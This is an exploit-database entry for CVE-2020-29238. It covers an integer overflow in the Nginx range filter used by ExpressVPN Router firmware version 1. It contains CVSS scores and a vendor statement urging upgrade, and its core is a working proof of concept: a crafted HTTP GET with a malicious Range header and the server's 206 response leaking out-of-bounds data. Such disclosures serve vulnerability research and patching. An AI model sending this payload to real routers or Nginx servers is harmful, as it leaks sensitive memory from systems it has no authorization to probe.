Lucene search

K
zdtZdt1337DAY-ID-36098
HistoryApr 13, 2021 - 12:00 a.m.

ExpressVPN VPN Router 1.0 - Router Login Panels Integer Overflow Vulnerability

2021-04-1300:00:00
0day.today
35

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow
# Exploit Author: Jai Kumar Sharma
# Vendor Homepage: https://www.expressvpn.com/
# Software Link: https://www.expressvpn.com/vpn-software/vpn-router
# Version: version 1
# Tested on: Windows/Ubuntu/MacOS
# CVE : CVE-2020-29238

*Proof of concept*:

ExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server

ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version of the ExpressVPN Router firmware available on our site, which is not vulnerable to this bug. Additionally, we highly discourage our users from exposing their router control panel to the Internet, as this class of bug would only be exploitable with access to the control panel, which is usually restricted to the local network. For help or support upgrading your router please visit: https://www.expressvpn.com/support/

ExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.

Crafted Request:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0)
Gecko/20100101 Firefox/81.0
Host: 127.0.0.1:8181
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758999
Connection: close


Response:
HTTP/1.1 206 Partial Content
Server: nginx/1.9.15
Date: Tue, 10 Nov 2020 19:22:05 GMT
Content-Type: multipart/byteranges; boundary=00000000002
Content-Length: 598
Last-Modified: Thu, 13 Sep 2018 04:55:28 GMT
Connection: close
ETag: "5b99edc0-99f"


--00000000002
Content-Type: text/html
Content-Range: bytes -14745-2462/2463

#  0day.today [2021-10-17]  #

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

Related for 1337DAY-ID-36098